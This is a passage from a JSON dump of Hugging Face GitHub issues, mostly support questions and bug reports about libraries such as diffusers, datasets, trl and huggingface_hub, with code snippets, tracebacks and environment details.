commit**: 28351dfefa581e4494b2047de3c093eaa7a7cdbc\r\n\r\n### Config\r\n\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nHF_TOKEN=...\r\n```\r\n\r\n## Notes\r\n\r\nI'm not sure what the `ChatCompletionRequestMessageContentPartText(...)` in the prompt is supposed to mean. Is it some internal request object rendered as a string?", "url": "https://github.com/huggingface/chat-ui/issues/1423", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-21T11:56:47Z", "updated_at": "2024-08-26T14:31:53Z", "comments": 5, "user": "erickrf" }, { "repo": "huggingface/trl", "number": 1955, "title": "How to fine-tune LLaVA using PPO", "body": "Does LLaVA support training with PPO? \r\nIf not, what modifications do I need to make to enable this support?", "url": "https://github.com/huggingface/trl/issues/1955", "state": "open", "labels": [ "\u2728 enhancement", "\ud83d\udc41\ufe0f VLM" ], "created_at": "2024-08-21T07:34:30Z", "updated_at": "2024-08-26T11:13:46Z", "user": "Yufang-Liu" }, { "repo": "huggingface/diffusers", "number": 9235, "title": "Is there any way to get diffusers-v0.27.0.dev0?", "body": "Is there any way to get diffusers-v0.27.0.dev0? I want to compare the difference between diffusers-v0.27.0.dev0 and branches that develop on it in another project, but I didn't find it on the releases or tags page.", "url": "https://github.com/huggingface/diffusers/issues/9235", "state": "closed", "labels": [], "created_at": "2024-08-21T03:42:11Z", "updated_at": "2024-08-21T05:10:26Z", "comments": 2, "user": "D222097" }, { "repo": "huggingface/llm.nvim", "number": 108, "title": "How to use proxy env var", "body": "I am unable to communicate with any http endpoints because I am behind a corporate proxy that uses self-signed certificates. Typically we use the http_proxy and https_proxy environment variables for this purpose, but I can't see any obvious configurations that I can add to my lua config to make this work.\r\n\r\nI have tried adding http_proxy = \"http://ProxyURL:ProxyPort\" to cmd_env in the llm.setup but it still keeps throwing an http error... invalid peer certificate, unknown issuer.", "url": "https://github.com/huggingface/llm.nvim/issues/108", "state": "open", "labels": [], "created_at": "2024-08-20T18:52:54Z", "updated_at": "2024-08-20T18:53:36Z", "user": "SethARhodes" }, { "repo": "huggingface/huggingface_hub", "number": 2468, "title": "How can I modify this repo files downloader jupyter notebook script to improve downloading speed? Perhaps multiple downloads at the same time?", "body": "This below code works but it is just slow\r\n\r\nHow can i speed up? Machine has much bigger speed and i really need to download lots of AI models to test \r\n\r\nThank you\r\n\r\n\r\n```\r\nimport os\r\nimport requests\r\nimport hashlib\r\nfrom huggingface_hub import list_repo_files, hf_hub_url, hf_hub_download\r\nfrom huggingface_hub.utils import HfFolder\r\nfrom tqdm import tqdm\r\n\r\ndef calculate_file_hash(file_path):\r\n sha256_hash = hashlib.sha256()\r\n with open(file_path, \"rb\") as f:\r\n for byte_block in iter(lambda: f.read(4096), b\"\"):\r\n sha256_hash.update(byte_block)\r\n return sha256_hash.hexdigest()\r\n\r\ndef download_file(url, target_path, headers, expected_size=None):\r\n response = requests.get(url, headers=headers, stream=True)\r\n response.raise_for_status()\r\n\r\n total_size = int(response.headers.get('content-length', 0))\r\n mode = 'ab' if os.path.exists(target_path) else 'wb'\r\n \r\n with tqdm(total=total_size, unit='B', unit_scale=True, desc=os.path.basename(target_path), initial=0, ascii=True) as pbar:\r\n with open(target_path, mode) as f:\r\n for chunk in response.iter_content(chunk_size=8192):\r\n if chunk:\r\n f.write(chunk)\r\n pbar.update(len(chunk))\r\n\r\n if expected_size and os.path.getsize(target_path) != expected_size:\r\n raise ValueError(f\"Size mismatch for {target_path}. Expected: {expected_size}, Got: {os.path.getsize(target_path)}\")\r\n\r\n# Define the repository and target folder\r\nrepo_id = \"YourUserName/reponame\"\r\ntarget_folder = \"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\"\r\n\r\n# Retrieve the token from the .huggingface folder or set it manually\r\ntoken = HfFolder.get_token()\r\nif not token:\r\n raise ValueError(\"Hugging Face token not found. Please log in using `huggingface-cli login` or set the token manually.\")\r\n\r\nheaders = {\"Authorization\": f\"Bearer {token}\"}\r\n\r\n# List all files in the repository\r\nfiles = list_repo_files(repo_id)\r\n\r\n# Ensure the target folder exists\r\nos.makedirs(target_folder, exist_ok=True)\r\n\r\n# Download each file directly to the target folder\r\nfor file in files:\r\n try:\r\n target_path = os.path.join(target_folder, file)\r\n \r\n # Get file metadata\r\n file_info = hf_hub_download(repo_id, filename=file, repo_type='model', token=token, local_dir=target_folder, local_dir_use_symlinks=False)\r\n expected_size = os.path.getsize(file_info)\r\n\r\n # Check if the file already exists and has the correct size\r\n if os.path.exists(target_path):\r\n if os.path.getsize(target_path) == expected_size:\r\n print(f\"File {file} already exists and is complete. Skipping download.\")\r\n continue\r\n else:\r\n print(f\"File {file} exists but is incomplete. Resuming download.\")\r\n\r\n # Get the URL for the file\r\n file_url = hf_hub_url(repo_id, filename=file, repo_type='model')\r\n \r\n # Ensure subdirectories exist\r\n os.makedirs(os.path.dirname(target_path), exist_ok=True)\r\n \r\n # Download the file with authentication and size verification\r\n download_file(file_url, target_path, headers, expected_size)\r\n \r\n # Set the correct permissions for the downloaded file\r\n os.chmod(target_path, 0o644) # Read and write for owner, read for group and others\r\n \r\n except Exception as e:\r\n print(f\"An error occurred while processing file {file}: {e}\")\r\n\r\nprint(f\"All files have been downloaded and verified in {target_folder}\")\r\n```\r\n\r\n\r\n### System info\r\n\r\n```shell\r\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- huggingface_hub version: 0.24.6\r\n- Platform: Linux-6.5.0-45-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: Yes\r\n- iPython shell: ZMQInteractiveShell\r\n- Running in notebook ?: Yes\r\n- Running in Google Colab ?: No\r\n- Token path ?: /home/Ubuntu/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: MonsterMMORPG\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: N/A\r\n- Jinja2: 3.1.4\r\n- Graphviz: N/A\r\n- keras: N/A\r\n- Pydot: N/A\r\n- Pillow: N/A\r\n- hf_transfer: N/A\r\n- gradio: N/A\r\n- tensorboard: N/A\r\n- numpy: N/A\r\n- pydantic: N/A\r\n- aiohttp: 3.10.5\r\n- ENDPOINT: https://huggingface.co\r\n- HF_HUB_CACHE: /home/Ubuntu/.cache/huggingface/hub\r\n- HF_ASSETS_CACHE: /home/Ubuntu/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /home/Ubuntu/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: False\r\n- HF_HUB_ETAG_TIMEOUT: 10\r\n- HF_HUB_DOWNLOAD_TIMEOUT: 10\r\n\r\n{'huggingface_hub version': '0.24.6',\r\n 'Platform': 'Linux-6.5.0-45-generic-x86_64-with-glibc2.35',\r\n 'Python version': '3.10.12',\r\n 'Running in iPython ?': 'Yes',\r\n 'iPython shell': 'ZM", "url": "https://github.com/huggingface/huggingface_hub/issues/2468", "state": "closed", "labels": [], "created_at": "2024-08-20T15:13:13Z", "updated_at": "2024-08-27T16:22:14Z", "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7116, "title": "datasets cannot handle nested json if features is given.", "body": "### Describe the bug\n\nI have a json named temp.json.\r\n```json\r\n{\"ref1\": \"ABC\", \"ref2\": \"DEF\", \"cuts\":[{\"cut1\": 3, \"cut2\": 5}]}\r\n```\r\nI want to load it.\r\n```python\r\nds = datasets.load_dataset('json', data_files=\"./temp.json\", features=datasets.Features({\r\n 'ref1': datasets.Value('string'),\r\n 'ref2': datasets.Value('string'),\r\n 'cuts': datasets.Sequence({\r\n \"cut1\": datasets.Value(\"uint16\"),\r\n \"cut2\": datasets.Value(\"uint16\")\r\n })\r\n}))\r\n```\r\nThe above code does not work. However, I can load it without giving features.\r\n```python\r\nds = datasets.load_dataset('json', data_files=\"./temp.json\")\r\n```\r\nIs it possible to load integers as uint16 to save some memory?\n\n### Steps to reproduce the bug\n\nAs in the bug description.\n\n### Expected behavior\n\nThe data are loaded and integers are uint16.\n\n### Environment info\n\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- `datasets` version: 2.21.0\r\n- Platform: Linux-5.15.0-118-generic-x86_64-with-glibc2.35\r\n- Python version: 3.11.9\r\n- `huggingface_hub` version: 0.24.5\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.5.0", "url": "https://github.com/huggingface/datasets/issues/7116", "state": "closed", "labels": [], "created_at": "2024-08-20T12:27:49Z", "updated_at": "2024-09-03T10:18:23Z", "comments": 3, "user": "ljw20180420" }, { "repo": "huggingface/datasets", "number": 7113, "title": "Stream dataset does not iterate if the batch size is larger than the dataset size (related to drop_last_batch)", "body": "### Describe the bug\r\n\r\nHi there,\r\n\r\nI use streaming and interleaving to combine multiple datasets saved in jsonl files. The size of dataset can vary (from 100ish to 100k-ish). I use dataset.map() and a big batch size to reduce the IO cost. It was working fine with datasets-2.16.1 but this problem shows up after I upgraded to datasets-2.19.2. With 2.21.0 the problem remains.\r\n\r\nPlease see the code below to reproduce the problem.\r\n\r\nThe dataset can iterate correctly if we set either streaming=False or drop_last_batch=False.\r\n\r\nI have to use drop_last_batch=True since it's for distributed training.\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\n# datasets==2.21.0\r\nimport datasets\r\ndef data_prepare(examples):\r\n print(examples[\"sentence1\"][0])\r\n return examples\r\n\r\nbatch_size = 101\r\n# the size of the dataset is 100\r\n# the dataset iterates correctly if we set either streaming=False or drop_last_batch=False \r\ndataset = datasets.load_dataset(\"mteb/biosses-sts\", split=\"test\", streaming=True)\r\ndataset = dataset.map(lambda x: data_prepare(x),\r\n drop_last_batch=True,\r\n batched=True, batch_size=batch_size)\r\nfor ex in dataset:\r\n print(ex)\r\n pass\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nThe dataset iterates regardless of the batch size.\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.21.0\r\n- Platform: Linux-6.1.58+-x86_64-with-glibc2.35\r\n- Python version: 3.10.14\r\n- `huggingface_hub` version: 0.24.5\r\n- PyArrow version: 17.0.0\r\n- Pandas version: 2.2.2\r\n- `fsspec` version: 2024.2.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7113", "state": "closed", "labels": [], "created_at": "2024-08-20T08:26:40Z", "updated_at": "2024-08-26T04:24:11Z", "comments": 1, "user": "memray" }, { "repo": "huggingface/diffusers", "number": 9216, "title": "I made a pipeline that lets you use any number of models at once", "body": "### Model/Pipeline/Scheduler description\n\nHere's how to do it:\r\nfrom rubberDiffusers import StableDiffusionRubberPipeline\r\npipe=StableDiffusionRubberPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\", torch_dtype=torch.float32,local_files_only=True,safety_checker=None, requires_safety_checker=False,\r\n)\r\n\r\npipe2=StableDiffusionRubberPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\", torch_dtype=torch.float32,local_files_only=True,safety_checker=None, requires_safety_checker=False,\r\n)\r\n\r\napply_multiModel(pipe)\r\npipe.added_model=[pipe2]\r\nimage=pipe(\"your prompt\",width=512,height=512,pos=[\"0:0-512:512\"],mask_strengths=[.5],model_kwargs=[{prompt=\"your prompt for the first loaded model\"}]).images[0]\r\n\r\n\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://github.com/alexblattner/RubberDiffusers", "url": "https://github.com/huggingface/diffusers/issues/9216", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-19T11:46:08Z", "updated_at": "2024-09-21T15:03:31Z", "comments": 3, "user": "alexblattner" }, { "repo": "huggingface/transformers", "number": 32873, "title": "How to use \u3010examples/pytorch/contrastive-image-text\u3011 to inter inference", "body": "### Feature request\n\nI have reviewed the training code for CLIP and successfully executed it. Now, I want to use the obtained model for inference testing.\r\n\n\n### Motivation\n\nI would like to test the performance of the model I have trained.\r\n\n\n### Your contribution\n\nI hope I can get a example script to inference testing like below script :\r\n\r\npython examples/pytorch/contrastive-image-text/run_clip.py \\\r\n --output_dir ./clip-roberta-finetuned \\\r\n --model_name_or_path ./clip-roberta \\\r\n --data_dir $PWD/data \\\r\n --dataset_name ydshieh/coco_dataset_script \\\r\n --dataset_config_name=2017 \\\r\n --image_column image_path \\\r\n --caption_column caption \\\r\n --remove_unused_columns=False \\\r\n --do_train --do_eval \\\r\n --per_device_train_batch_size=\"64\" \\\r\n --per_device_eval_batch_size=\"64\" \\\r\n --learning_rate=\"5e-5\" --warmup_steps=\"0\" --weight_decay 0.1 \\\r\n --overwrite_output_dir \\\r\n --push_to_hub", "url": "https://github.com/huggingface/transformers/issues/32873", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-08-19T05:54:54Z", "updated_at": "2024-08-19T08:33:50Z", "user": "rendaoyuan" }, { "repo": "huggingface/chat-ui", "number": 1415, "title": "Bad request: Task not found for this model", "body": "Hi all,\r\nI am facing the following issue when using HuggingFaceEndpoint for my custom finetuned model in my repository \"Nithish-2001/RAG-29520hd0-1-chat-finetune\" which is public with gradio. \r\n\r\nllm_name: Nithish-2001/RAG-29520hd0-1-chat-finetune\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/huggingface_hub/utils/_errors.py\", line 304, in hf_raise_for_status\r\n response.raise_for_status()\r\n File \"/usr/local/lib/python3.10/dist-packages/requests/models.py\", line 1024, in raise_for_status\r\n raise HTTPError(http_error_msg, response=self)\r\nrequests.exceptions.HTTPError: 400 Client Error: Bad Request for url: https://api-inference.huggingface.co/models/Nithish-2001/RAG-29520hd0-1-chat-finetune\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/routes.py\", line 763, in predict\r\n output = await route_utils.call_process_api(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/route_utils.py\", line 288, in call_process_api\r\n output = await app.get_blocks().process_api(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/blocks.py\", line 1931, in process_api\r\n result = await self.call_function(\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/blocks.py\", line 1516, in call_function\r\n prediction = await anyio.to_thread.run_sync( # type: ignore\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/to_thread.py\", line 33, in run_sync\r\n return await get_asynclib().run_sync_in_worker_thread(\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/_backends/_asyncio.py\", line 877, in run_sync_in_worker_thread\r\n return await future\r\n File \"/usr/local/lib/python3.10/dist-packages/anyio/_backends/_asyncio.py\", line 807, in run\r\n result = context.run(func, *args)\r\n File \"/usr/local/lib/python3.10/dist-packages/gradio/utils.py\", line 826, in wrapper\r\n response = f(*args, **kwargs)\r\n File \"\", line 90, in conversation\r\n response = qa_chain.invoke({\"question\": message, \"chat_history\": formatted_chat_history})\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/conversational_retrieval/base.py\", line 169, in _call\r\n answer = self.combine_docs_chain.run(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 603, in run\r\n return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 381, in __call__\r\n return self.invoke(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/combine_documents/base.py\", line 138, in _call\r\n output, extra_return_dict = self.combine_docs(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/combine_documents/stuff.py\", line 257, in combine_docs\r\n return self.llm_chain.predict(callbacks=callbacks, **inputs), {}\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 316, in predict\r\n return self(kwargs, callbacks=callbacks)[self.output_key]\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/_api/deprecation.py\", line 170, in warning_emitting_wrapper\r\n return wrapped(*args, **kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 381, in __call__\r\n return self.invoke(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 164, in invoke\r\n raise e\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/base.py\", line 154, in invoke\r\n self._call(inputs, run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 126, in _call\r\n response = self.generate([inputs], run_manager=run_manager)\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain/chains/llm.py\", line 138, in generate\r\n return self.llm.generate_prompt(\r\n File \"/usr/local/lib/python3.10/dist-packages/langchain_core/language_models/llms.py\", line 750, in generate_prompt\r\n return self.generate(prompt_strings, stop=stop, callbacks=callbacks, **kwargs)\r\n File", "url": "https://github.com/huggingface/chat-ui/issues/1415", "state": "open", "labels": [ "support" ], "created_at": "2024-08-18T09:33:10Z", "updated_at": "2024-08-25T22:38:00Z", "comments": 1, "user": "NITHISH-Projects" }, { "repo": "huggingface/sentence-transformers", "number": 2893, "title": "how to finetune sentence-transformers with unsupervised methods?", "body": "how to finetune sentence-transformers with unsupervised methods? for semantic search", "url": "https://github.com/huggingface/sentence-transformers/issues/2893", "state": "closed", "labels": [], "created_at": "2024-08-17T02:32:09Z", "updated_at": "2024-08-18T02:51:29Z", "user": "keyuchen21" }, { "repo": "huggingface/diffusers", "number": 9205, "title": "Can we pass output_attentions=True to DiT model such as pixart to get attention output?", "body": "Can we pass output_attentions=True to DiT model such as pixart to get attention output? Like using output_attentions=True in transformer?", "url": "https://github.com/huggingface/diffusers/issues/9205", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-16T17:26:14Z", "updated_at": "2024-09-16T15:02:42Z", "comments": 1, "user": "foreverpiano" }, { "repo": "huggingface/datatrove", "number": 266, "title": "How to look into the processed data?", "body": "Hi,\r\n\r\nAfter running `tokenize_from_hf_to_s3.py`, I would like to inspect the resulting data. But I find that the current data is in a binary file (`.ds`). is there a way to allow me to look into the data?\r\n\r\nThanks!", "url": "https://github.com/huggingface/datatrove/issues/266", "state": "open", "labels": [], "created_at": "2024-08-16T16:54:45Z", "updated_at": "2024-08-29T15:26:35Z", "user": "shizhediao" }, { "repo": "huggingface/trl", "number": 1934, "title": "How to Save the PPOTrainer?", "body": "The previous issue for this question https://github.com/huggingface/trl/issues/1643#issue-2294886330 is closed but remained unanswered. If I do `ppo_trainer.save_pretrained('path/to/a/folder')` and then `ppo_trainer.from_pretrained('path/to/that/folder')`, I get this error:\r\n\r\nValueError: tokenizer must be a PreTrainedTokenizerBase like a PreTrainedTokenizer or a PreTrainedTokenizerFast, got \r\n\r\nIt seems that the `PPOTrainer` object does not implement the two functions from `huggingface_hub.PyTorchModelHubMixin`. How should I save my trainer then?", "url": "https://github.com/huggingface/trl/issues/1934", "state": "closed", "labels": [], "created_at": "2024-08-16T09:41:39Z", "updated_at": "2024-10-07T14:57:51Z", "user": "ThisGuyIsNotAJumpingBear" }, { "repo": "huggingface/parler-tts", "number": 109, "title": "How many epoch of training did you do? What is the accuracy?", "body": "How many epoch of training did you do? What is the accuracy?", "url": "https://github.com/huggingface/parler-tts/issues/109", "state": "open", "labels": [], "created_at": "2024-08-16T09:35:31Z", "updated_at": "2024-08-16T09:35:31Z", "user": "xuezhongfei2008" }, { "repo": "huggingface/diffusers", "number": 9195, "title": "Problem with Flux Schnell bfloat16 multiGPU", "body": "### Describe the bug\r\n\r\nHello! I set device_map='balanced' and get images generated in 2.5 minutes (expected in 12-20 seconds), while in pipe.hf_device_map it shows that the devices are distributed like this:\r\n```\r\n{\r\n \"transformer\": \"cuda:0\",\r\n \"text_encoder_2\": \"cuda:2\",\r\n \"text_encoder\": \"cuda:0\",\r\n \"vae\": \"cuda:1\"\r\n }\r\n```\r\nI have 3 video cards 3090 Ti 24 GB and I can\u2019t run it on them.\r\n\r\nI also tried this way:\r\n pipe.transformer.to('cuda:2')\r\n pipe.text_encoder.to('cuda:2')\r\n pipe.text_encoder_2.to('cuda:1')\r\n pipe.vae.to('cuda:0')\r\n\r\nWhat is the best way to launch it so that generation occurs on the GPU and quickly?\r\n\r\n### Reproduction\r\n```python\r\n pipe = FluxPipeline.from_pretrained(\r\n path_chkpt,\r\n torch_dtype=torch.bfloat16,\r\n device_map='balanced',\r\n )\r\n```\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 22.04 3 GPU: 3090 TI 24 GB\r\n\r\naccelerate==0.30.1\r\naddict==2.4.0\r\napscheduler==3.9.1\r\nautocorrect==2.5.0\r\nchardet==4.0.0\r\ncryptography==37.0.2\r\ncurl_cffi\r\ndiffusers==0.30.0\r\nbeautifulsoup4==4.11.2\r\neinops\r\nfacexlib>=0.2.5\r\nfastapi==0.92.0\r\nhidiffusion==0.1.6\r\ninvisible-watermark>=0.2.0\r\nnumpy==1.24.3\r\nopencv-python==4.8.0.74\r\npandas==2.0.3\r\npycocotools==2.0.6\r\npymystem3==0.2.0\r\npyyaml==6.0\r\npyjwt==2.6.0\r\npython-multipart==0.0.5\r\npytrends==4.9.1\r\npsycopg2-binary\r\nrealesrgan==0.3.0\r\nredis==4.5.1\r\nsacremoses==0.0.53\r\nselenium==4.2.0\r\nsentencepiece==0.1.97\r\nscipy==1.10.1\r\nscikit-learn==0.24.1\r\nsupervision==0.16.0\r\ntb-nightly==2.14.0a20230629\r\ntensorboard>=2.13.0\r\ntomesd\r\ntransformers==4.40.1\r\ntimm==0.9.16\r\nyapf==0.32.0\r\nuvicorn==0.20.0\r\n\r\nspacy==3.7.2\r\nnest_asyncio==1.5.8\r\nhttpx==0.25.0\r\n\r\ntorchvision==0.15.2\r\n\r\ninsightface==0.7.3\r\npsutil==5.9.6\r\ntk==0.1.0\r\ncustomtkinter==5.2.1\r\ntensorflow==2.13.0\r\nopennsfw2==0.10.2\r\nprotobuf==4.24.4\r\ngfpgan==1.3.8\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9195", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-16T06:30:54Z", "updated_at": "2025-12-05T06:38:14Z", "comments": 26, "user": "OlegRuban-ai" }, { "repo": "huggingface/diffusers", "number": 9184, "title": "What is the correct way to apply the dictionary with the control strengths (called \u201cscales\u201d) but with blocks?", "body": "### Describe the bug\n\nI have managed to apply the basic dictionary. as the documentation mentions\r\n\r\n```\r\nadapter_weight_scales = { \"unet\": { \"down\": 1, \"mid\": 0, \"up\": 0} }\r\npipe.set_adapters(\"Lora1\", adapter_weight_scales)\r\n```\r\n\r\nand it already works for N number of LORAS that I want to load, for example\r\n\r\n```\r\nadapter_weight_scales_1 = { \"unet\": { \"down\": 0.5, \"mid\": 0, \"up\": 0} }\r\nadapter_weight_scales_2 = { \"unet\": { \"down\": 0, \"mid\": 0, \"up\": 0.5} }\r\npipe.set_adapters([\"Lora1\", \"Lora2\"], [adapter_weight_scales_1, adapter_weight_scales_2])\r\n\r\n```\r\nit works for me correctly, and I get very good results in my images\r\n\r\n\n\n### Reproduction\n\nNow I'm trying to apply the scaling dictionary to LORA but with blocks, for example:\r\n\r\n```\r\nadapter_weight_scales_blocks_1 = {\r\n 'unet': {\r\n 'down': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.2]}, \r\n 'mid': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.2]}, \r\n 'up': {\r\n 'block_0': [0.2, 0.5], \r\n 'block_1': [0.5, 0.5, 0.2]\r\n }\r\n }\r\n }\r\n\r\n adapter_weight_scales_blocks_2 = {\r\n 'unet': {\r\n 'down': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5]}, \r\n 'mid': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5]}, \r\n 'up': {\r\n 'block_0': [0.5, 0.5], \r\n 'block_1': [0.5, 0.5, 0.5]\r\n }\r\n }\r\n }\r\n\r\n\r\npipe.set_adapters([\"Lora1\", \"Lora2\"], [ adapter_weight_scales_blocks_1, adapter_weight_scales_blocks_2])\r\n```\r\n\n\n### Logs\n\n```shell\nbut an error like this is getting me:\r\n\r\n\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/loaders/lora_base.py in set_adapters(self, adapter_names, adapter_weights)\r\n 571 \r\n 572 if issubclass(model.__class__, ModelMixin):\r\n--> 573 model.set_adapters(adapter_names, _component_adapter_weights[component])\r\n 574 elif issubclass(model.__class__, PreTrainedModel):\r\n 575 set_adapters_for_text_encoder(adapter_names, model, _component_adapter_weights[component])\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/loaders/peft.py in set_adapters(self, adapter_names, weights)\r\n 107 weights = scale_expansion_fn(self, weights)\r\n 108 \r\n--> 109 set_weights_and_activate_adapters(self, adapter_names, weights)\r\n 110 \r\n 111 def add_adapter(self, adapter_config, adapter_name: str = \"default\") -> None:\r\n\r\n/usr/local/lib/python3.10/dist-packages/diffusers/utils/peft_utils.py in set_weights_and_activate_adapters(model, adapter_names, weights)\r\n 264 else:\r\n 265 module.active_adapter = adapter_name\r\n--> 266 module.set_scale(adapter_name, get_module_weight(weight, module_name))\r\n 267 \r\n 268 # set multiple active adapters\r\n\r\n/usr/local/lib/python3.10/dist-packages/peft/tuners/lora/layer.py in set_scale(self, adapter, scale)\r\n 278 # Ignore the case where the adapter is not in the layer\r\n 279 return\r\n--> 280 self.scaling[adapter] = scale * self.lora_alpha[adapter] / self.r[adapter]\r\n 281 \r\n 282 def scale_layer(self, scale: float) -> None:\r\n\r\nTypeError: unsupported operand type(s) for *: 'dict' and 'float'``\r\n```\r\n\r\n\r\nWhat would be the correct way to do it?\n```\n\n\n### System Info\n\nSystem Info\r\nI am using google colab,\r\ndiffusers version: 0.30.0\r\nPython version: 3.10.\r\n\n\n### Who can help?\n\nDiffuser masters can help me understand how to use that feature: @sayakpaul, @yiyixuxu @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9184", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-15T06:05:42Z", "updated_at": "2024-08-17T00:54:28Z", "user": "Eduardishion" }, { "repo": "huggingface/diffusers", "number": 9180, "title": "Pipeline has no attribute '_execution_device'", "body": "### Describe the bug\r\n\r\nHello, I implemented my own custom pipeline referring StableDiffusionPipeline (RepDiffusionPipeline), but there are some issues\r\nI called \"accelerator.prepare\" properly, and mapped the models on device (with \"to.(accelerator.device)\")\r\nBut when I call pipeline and the '__call__' function is called, sometimes I met the error \r\nIt is not only problem in using multi-gpu, it occurs when I use single gpu. \r\nFor example, I defined my pipeline for my validation in training code like this: \r\n```python\r\nval_pipe = RepDiffusionPipeline.from_pretrained(\r\n \"runwayml/stable-diffusion-v1-5\",\r\n unet=accelerator.unwrap_model(unet),\r\n rep_encoder=accelerator.unwrap_model(rep_encoder),\r\n vae=accelerator.unwrap_model(vae),\r\n revision=None, variant=None, torch_dtype=weight_dtype, safety_checker=None\r\n ).to(accelerator.device)\r\n```\r\n then, when I called 'val_pipe' like this: \r\n```\r\nmodel_pred = val_pipe(\r\n image = condition_original_image if args.val_mask_op else data[\"original_images\"],\r\n representation = representation,\r\n prompt = \"\",\r\n num_inference_steps = 20,\r\n image_guidance_scale = 1.5,\r\n guidance_scale = scale,\r\n generator = generator\r\n ).images[0]\r\n``` \r\n \r\nAt that time, the error \"RepDiffusionPipeline has no attribute '_execution_device'\" occurs. (Not always, just randomly)\r\nHow can I solve this issue, or what part of my code can be doubted and fixed?\r\nThank you for reading:)\r\n\r\n### Reproduction\r\n\r\nIt occurs randomly, so there is no option to reproduce... \r\n\r\nBut when I call the defined pipeline, it occurs randomly. \r\n\r\n### Logs\r\n\r\n```shell\r\nRepDiffusionPipeline has no attribute '_execution_device'\r\n```\r\n\r\n\r\n### System Info\r\n\r\nI tried to test in various diffusers & python versions, but the problem still occurs. \r\nIn now, I am running my code in diffusers 0.27.2, python 3.10.14. \r\n\r\nWARNING[XFORMERS]: xFormers can't load C++/CUDA extensions. xFormers was built for:\r\n PyTorch 2.2.2+cu121 with CUDA 1201 (you have 2.2.2+cu118)\r\n Python 3.10.14 (you have 3.10.14)\r\n Please reinstall xformers (see https://github.com/facebookresearch/xformers#installing-xformers)\r\n Memory-efficient attention, SwiGLU, sparse and more won't be available.\r\n Set XFORMERS_MORE_DETAILS=1 for more details\r\n\r\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- `diffusers` version: 0.27.2\r\n- 